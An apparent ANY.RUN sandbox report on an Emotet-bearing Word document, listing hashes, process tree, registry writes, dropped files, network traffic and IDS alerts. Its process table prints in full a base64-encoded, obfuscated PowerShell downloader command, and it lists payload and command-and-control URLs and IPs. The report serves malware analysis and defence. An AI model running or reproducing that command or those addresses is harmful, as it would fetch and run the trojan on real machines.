File name: | random.doc |
Full analysis: | https://app.any.run/tasks/fc090ea6-e40e-409b-8d6b-e899091a7dd7 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | March 14, 2019, 11:58:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 09:03:00 2019, Last Saved Time/Date: Thu Mar 14 09:03:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 10, Security: 0 |
MD5: | AEA72462537D534EFE9C27E021692A49 |
SHA1: | FB9BFEB91619FF8195142EE71A7BD7F38AE966E0 |
SHA256: | 8F1931F7BD6758AF6A41B0E553CE691ACD035B57F59579F5F38AD4EC55B649D6 |
SSDEEP: | 6144:T77HUUUUUUUUUUUUUUUUUUUT52VMqiruEPRDLneFyn816Wwv5:T77HUUUUUUUUUUUUUUUUUUUTCouEPRDb |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 10 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 10 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2019:03:14 09:03:00 |
CreateDate: | 2019:03:14 09:03:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2960 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\random.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2756 | powershell -e IAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIAAgAHMAeQBTAFQARQBNAC4ASQBPAC4AQwBPAG0AcAByAEUAUwBTAGkATwBOAC4AZABlAGYATABhAFQARQBzAFQAUgBFAEEAbQAoAFsAUwBZAHMAVABFAG0ALgBpAE8ALgBtAGUATQBvAHIAeQBzAHQAUgBFAEEATQBdAFsAQwBvAE4AVgBlAHIAVABdADoAOgBGAFIAbwBNAGIAYQBzAGUANgA0AHMAVAByAEkAbgBHACgAIAAoACcAVgBaAEoAJwArACcAaABhACcAKwAnADkAcwB3AEUAJwArACcASQBiAC8AaQBqADQAWQBsAEoARABaAG4AawBmACcAKwAnAFkAbwBNAGIAUQBTADgASgBFAG8ATwAyAFcAZABkADQAOABNAHcAJwArACcAaQB5ACcAKwAnAGYASQBrADEAMgBaAEoAJwArACcAbgBLACcAKwAnADMAJwArACcAWABYACcAKwAnAGsAUAA5AGUAJwArACcASgAnACsAJwBTACcAKwAnAFEAJwArACcAcAAnACsAJwBPAC8AVABsAHUATwBmAHUAZgAnACsAJwBYAG0AJwArACcAUgBkAHcAJwArACcALwByACcAKwAnADEATwBSACcAKwAnAFIAUQByACcAKwAnACsAegBTACcAKwAnAEEAdwBLAGcATQBhACcAKwAnAGUAegAnACsAJwBGAGMAcwBaACcAKwAnAHcAbwBTACcAKwAnAGoAWQBOAHYAaQAnACsAJwBqADgAbwBMACcAKwAnAEgAJwArACcAbABBAEcAJwArACcALwB6AEUAWQBsACcAKwAnADUAJwArACcATAAxAEQAYgAnACsAJwAyAGYAbQBVAHoAJwArACcAaQBBAEIAbQAnACsAJwBDAGEAJwArACcAMgBzAGIAZgB1AGIAJwArACcATQBPAHcAYgBkACcAKwAnAEsAKwBVACcAKwAnAFAAJwArACcAQgBDAG0AJwArACcAQwBZACcAKwAnAGYAVwAnACsAJwBsADEAcgBVAHUAeABMADcAJwArACcAcwBGAFQAJwArACcAaAA3ACcAKwAnAFkAVwB5ACcAKwAnAG4AUwB4ADIAWABIAE8AZgBZADIAZgA2AGwAJwArACcAZwBzADgANAAnACsAJwArAEgAZgBEAC8AZABmADMAJwArACcANwBpACcAKwAnAFcAOQAnACsAJwA5AEoAJwArACcAbwBZAGIAUwAnACsAJwBWADIAZwBuACcAKwAnAHkAJwArACcAKwBvAEkAJwArACcAMQAnACsAJwA3AEUAdwBkAEoAUwAnACsAJwB2ACcAKwAnAGMAJwArACcAbABLAGEAJwArACcAUgBwADUAbQBzAHUAJwArACcAbQBJAG4ANgAvAEwAJwArACcAVQBhAEgAbAAzAHAAYgAnACsAJwBaAG8AdQBpADAAcQAnACsAJwAyACcAKwAnAFcATgAzAG0AbABuAHMAYgBmAGoATgBoAGoAJwArACcAUgA0AGIARwB0ACcAKwAnAHAAUgAvAFMAVwAnACsAJwBqAG0AUAB2AEQAZwBTACcAKwAnAGsAJwArACcARwBVAEIAQwBIACcAKwAnACsAJwArACcAZgBBAHMAcwB6ACcAKwAnAEYAOAAnACsAJwBNAEwAQQAnACsAJwBBAEoAJwArACcAQwBFADAARQAvAFQAJwArACcAagA2ACcAKwAnADQAdgAnACsAJwA4AGcAaQBHACcAKwAnAE4AJwArACcARgBvAGwAVgBJAEIAJwArACcASwBJACcAKwAnAFYAbwBkAHMAJwArACcALwBvACcAKwAnAGgAWgBwAEMAdAAnACsAJwA1ACcAKwAnAG8AbQBIACsAdQBsACcAKwAnAG0AJwArACcANQB6AFQAYQB6AG0AeABrAGoAUgAnACsAJwBQACcAKwAnADYAJwArACcAbQAwACcAKwAnADcATwBKAHkAWQAwAHcARwBlAGsAOABjAFoAJwArACcAMAAnACsAJwB5ACcAKwAnAEUAVQAxACcAKwAnADgAbABLADMAQQBpAG0AUgBtAGwAeQBEAEgATwA5AHQAOQAnACsAJwAyADkALwBqACcAKwAnAFQANQBZAG0ARQAnACsAJwBIAFgAaAAnACsAJwBwACcAKwAnAGUAZgAzAGEAJwArACcAMwBMAHcAagB0AHkAJwArACcAawBYAE8ARwB1AFEATAAxAFAASABYADUAQQA2AFQAJwArACcAcgB4AFUARABqADUAWQBhAE0AUgAnACsAJwBnAHkAdAB2ACcAKwAnADcAVABZACcAKwAnAHYAJwArACcASgBGAEIAagAnACsAJwBYAHAAcgAnACsAJwBLACsAJwArACcASgB2ACcAKwAnAGsAVQB6AGYAdQB4AHEAVAAvAFYASQAnACsAJwAvAEcAJwArACcAWQBYAC8AJwArACcAZwAnACsAJwA3AEcAWABRADYAJwArACcAcQBBAFIAZQA3AG0AJwArACcAdwAzACcAKwAnAG8AQgAnACsAJwB4ADUAOQAnACsAJwBRAE8AJwArACcATAAnACsAJwA4AHEAUABoACcAKwAnAHcARQB0ACcAKwAnADYATABhAEgAdwA3AE8AaAA2ACcAKwAnAHQANQBRAHIAOAAnACsAJwB3AHkARwAnACsAJwBCAE4AJwArACcANAAnACsAJwAxAGMAPQAnACkAKQAgACwAWwBzAHkAcwBUAEUAbQAuAGkAbwAuAGMAbwBtAFAAcgBlAFMAcwBJAG8ATgAuAGMAbwBtAHAAUgBlAFMAcwBJAG8AbgBNAG8AZABlAF0AOgA6AGQAZQBDAE8AbQBQAFIAZQBzAHMAIAApAHwAJQB7AE4ARQB3AC0AbwBCAGoAZQBDAHQAIABzAHkAcwB0AEUATQAuAGkAbwAuAHMAVABSAEUAQQBtAHIARQBBAEQAZQBSACgAIAAkAF8ALABbAHQARQBYAHQALgBFAG4AYwBPAGQAaQBOAEcAXQA6ADoAYQBTAGMAaQBpACAAKQB9AHwAJQB7ACAAJABfAC4AcgBlAEEARABUAE8ARQBOAGQAKAApACAAfQApAHwAJgAoACAAKABbAHMAdAByAGkATgBHAF0AJAB2AGUAUgBiAE8AUwBFAFAAUgBFAGYARQBSAEUAbgBDAGUAKQBbADEALAAzAF0AKwAnAFgAJwAtAEoAbwBJAG4AJwAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1012 | "C:\Users\admin\746.exe" | C:\Users\admin\746.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Sticky Notes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3804 | "C:\Users\admin\746.exe" | C:\Users\admin\746.exe | 746.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Sticky Notes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3220 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 746.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Sticky Notes Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3912 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Sticky Notes Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | lw, |
Value: 6C772C00900B0000010000000000000000000000 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1315831831 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1315831952 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1315831953 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 900B0000FED430575DDAD40100000000 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | fx, |
Value: 66782C00900B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | fx, |
Value: 66782C00900B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2960) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE3CC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2756 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9NMAB14VWL2DMNWPO572.temp | — | |
MD5:— | SHA256:— | |||
2756 | powershell.exe | C:\Users\admin\746.exe | — | |
MD5:— | SHA256:— | |||
2756 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2756 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20ed13.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2960 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6D935249029846D3AB4D001173675385 | SHA256:BBFA413DE4C43084E942884946597A4C32A541880FEFA01A053A2F4EF1346A43 | |||
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$random.doc | pgc | |
MD5:1F698DE2E250D9CA1DAA0CAA4C8C7A9D | SHA256:12721B382AAFA01D7FB0658B2C8A024E662F1C7C181E6F99AE2806E0F05D46C8 | |||
3804 | 746.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:596606615DF882390896C6A033662418 | SHA256:C324D916167E5BAA999D8B9201794AD447267884A658D76A3DF54886E8DEBCCE |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3912 | wabmetagen.exe | GET | — | 201.220.152.101:80 | http://201.220.152.101/ | AR | — | — | malicious |
— | — | GET | — | 190.97.219.241:80 | http://190.97.219.241/ | CO | — | — | malicious |
2756 | powershell.exe | GET | 200 | 173.230.251.210:80 | http://shefdomi.com/ihrbuild.com/niL/ | US | executable | 353 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2756 | powershell.exe | 103.31.250.67:443 | tribuana-aerospace.com | Argon Data Communication | ID | suspicious |
2756 | powershell.exe | 190.210.176.190:443 | pasioncontinental.com | NSS S.A. | AR | suspicious |
2756 | powershell.exe | 38.123.253.66:443 | smesmedia.com | Cogent Communications | US | unknown |
2756 | powershell.exe | 173.230.251.210:80 | shefdomi.com | ACENET, INC. | US | suspicious |
3912 | wabmetagen.exe | 201.220.152.101:80 | — | Intercom SRL | AR | malicious |
— | — | 190.97.219.241:80 | — | Empresa de Recursos Tecnologicos S.A E.S.P | CO | malicious |
Domain | IP | Reputation |
---|---|---|
smesmedia.com |
| unknown |
tribuana-aerospace.com |
| suspicious |
pasioncontinental.com |
| suspicious |
shefdomi.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2756 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2756 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2756 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2756 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2756 | powershell.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
3912 | wabmetagen.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |